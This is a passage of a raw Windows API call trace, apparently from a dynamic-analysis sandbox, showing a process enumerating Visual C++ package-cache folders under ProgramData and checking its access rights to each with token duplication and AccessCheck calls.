Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.251] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.251] GetLastError () returned 0x7a [0106.251] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86", RequestedInformation=0x7, pSecurityDescriptor=0x28a6518, nLength=0xcc, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x28a6518, lpnLengthNeeded=0x281afc8) returned 1 [0106.251] GetLastError () returned 0x7a [0106.251] GetCurrentThread () returned 0xfffffffe [0106.251] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.251] GetCurrentProcess () returned 0xffffffff [0106.251] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.251] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.251] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.251] AccessCheck (in: pSecurityDescriptor=0x28a6518, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.251] CloseHandle (hObject=0x340) returned 1 [0106.252] CloseHandle (hObject=0x32c) returned 1 [0106.252] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.252] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.252] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.252] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.252] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.252] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.252] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.252] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.252] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.252] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.252] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.252] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.252] GetLastError () returned 0x7a [0106.252] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.252] GetLastError () returned 0x7a [0106.252] GetCurrentThread () returned 0xfffffffe [0106.252] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.252] GetCurrentProcess () returned 0xffffffff [0106.252] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.252] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.252] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.252] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.252] CloseHandle (hObject=0x344) returned 1 [0106.252] CloseHandle (hObject=0x33c) returned 1 [0106.253] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.253] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.253] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.253] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.253] GetLastError () returned 0x7a [0106.253] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x28a63f0, nLength=0xcc, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a63f0, lpnLengthNeeded=0x281b560) returned 1 [0106.253] GetLastError () returned 0x7a [0106.253] GetCurrentThread () returned 0xfffffffe [0106.253] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.253] GetCurrentProcess () returned 0xffffffff [0106.253] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.253] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.253] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.253] AccessCheck (in: pSecurityDescriptor=0x28a63f0, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.253] CloseHandle (hObject=0x32c) returned 1 [0106.254] CloseHandle (hObject=0x344) returned 1 [0106.254] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.254] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.254] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.254] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.254] GetLastError () returned 0x7a [0106.254] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64", RequestedInformation=0x7, pSecurityDescriptor=0x28a6518, nLength=0xcc, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x28a6518, lpnLengthNeeded=0x281afc8) returned 1 [0106.254] GetLastError () returned 0x7a [0106.254] GetCurrentThread () returned 0xfffffffe [0106.254] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.254] GetCurrentProcess () returned 0xffffffff [0106.254] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.254] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.254] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.254] AccessCheck (in: pSecurityDescriptor=0x28a6518, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.254] CloseHandle (hObject=0x340) returned 1 [0106.254] CloseHandle (hObject=0x32c) returned 1 [0106.254] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.254] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.254] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.254] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.254] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.254] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.254] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.254] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.255] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.255] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.255] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.255] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.255] GetLastError () returned 0x7a [0106.255] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.255] GetLastError () returned 0x7a [0106.255] GetCurrentThread () returned 0xfffffffe [0106.255] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.255] GetCurrentProcess () returned 0xffffffff [0106.255] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.255] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.255] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.255] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.255] CloseHandle (hObject=0x344) returned 1 [0106.255] CloseHandle (hObject=0x33c) returned 1 [0106.256] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.256] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.256] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.256] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.256] GetLastError () returned 0x7a [0106.256] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x28a63f0, nLength=0xcc, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a63f0, lpnLengthNeeded=0x281b560) returned 1 [0106.256] GetLastError () returned 0x7a [0106.256] GetCurrentThread () returned 0xfffffffe [0106.256] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.256] GetCurrentProcess () returned 0xffffffff [0106.256] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.256] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.256] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.256] AccessCheck (in: pSecurityDescriptor=0x28a63f0, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.256] CloseHandle (hObject=0x32c) returned 1 [0106.256] CloseHandle (hObject=0x344) returned 1 [0106.256] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.256] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.256] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.256] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.257] GetLastError () returned 0x7a [0106.257] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64", RequestedInformation=0x7, pSecurityDescriptor=0x28a6518, nLength=0xcc, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x28a6518, lpnLengthNeeded=0x281afc8) returned 1 [0106.257] GetLastError () returned 0x7a [0106.257] GetCurrentThread () returned 0xfffffffe [0106.257] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.257] GetCurrentProcess () returned 0xffffffff [0106.257] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.257] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.257] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.257] AccessCheck (in: pSecurityDescriptor=0x28a6518, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.257] CloseHandle (hObject=0x340) returned 1 [0106.257] CloseHandle (hObject=0x32c) returned 1 [0106.257] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.257] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.257] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.257] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.257] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.257] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.257] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.257] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.257] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.257] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.257] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.257] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.257] GetLastError () returned 0x7a [0106.258] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.258] GetLastError () returned 0x7a [0106.258] GetCurrentThread () returned 0xfffffffe [0106.258] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.258] GetCurrentProcess () returned 0xffffffff [0106.258] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.258] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.258] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.258] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.258] CloseHandle (hObject=0x344) returned 1 [0106.258] CloseHandle (hObject=0x33c) returned 1 [0106.258] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.258] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.258] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.258] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.258] GetLastError () returned 0x7a [0106.258] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x28a63f0, nLength=0xcc, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a63f0, lpnLengthNeeded=0x281b560) returned 1 [0106.258] GetLastError () returned 0x7a [0106.258] GetCurrentThread () returned 0xfffffffe [0106.258] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.258] GetCurrentProcess () returned 0xffffffff [0106.258] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.258] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.258] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.258] AccessCheck (in: pSecurityDescriptor=0x28a63f0, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.258] CloseHandle (hObject=0x32c) returned 1 [0106.258] CloseHandle (hObject=0x344) returned 1 [0106.259] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.259] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.259] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.259] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.259] GetLastError () returned 0x7a [0106.259] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64", RequestedInformation=0x7, pSecurityDescriptor=0x28a6518, nLength=0xcc, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x28a6518, lpnLengthNeeded=0x281afc8) returned 1 [0106.259] GetLastError () returned 0x7a [0106.259] GetCurrentThread () returned 0xfffffffe [0106.259] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.259] GetCurrentProcess () returned 0xffffffff [0106.259] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.259] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.259] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.259] AccessCheck (in: pSecurityDescriptor=0x28a6518, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.259] CloseHandle (hObject=0x340) returned 1 [0106.259] CloseHandle (hObject=0x32c) returned 1 [0106.259] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.259] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.259] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.259] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.259] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.260] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.260] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.260] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.260] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.260] FindNextFileW (in: hFindFile=0x5fc2d8, 